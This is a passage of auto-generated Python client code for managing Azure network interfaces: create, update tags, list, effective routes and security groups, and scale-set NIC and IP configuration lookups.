:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2018_01_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def _update_tags_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Updates a network interface tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to update network interface tags.
:type parameters: ~azure.mgmt.network.v2018_01_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def _get_effective_route_table_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.EffectiveRouteListResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveRouteListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
def begin_get_effective_route_table(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
def _list_effective_network_security_groups_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.EffectiveNetworkSecurityGroupListResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveNetworkSecurityGroupListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def begin_list_effective_network_security_groups(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_01_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_01_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_virtual_machine_scale_set_ip_configurations(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceIPConfigurationListResult"]
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceIPConfigurationListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_ip_configurations.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_ip_configurations.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
def get_virtual_machine_scale_set_ip_configuration(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
ip_configuration_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterfaceIPConfiguration"
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration.
:type ip_configuration_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceIPConfiguration"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-03-30"
# Construct URL
url = self.get_virtual_machine_scale_set_ip_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
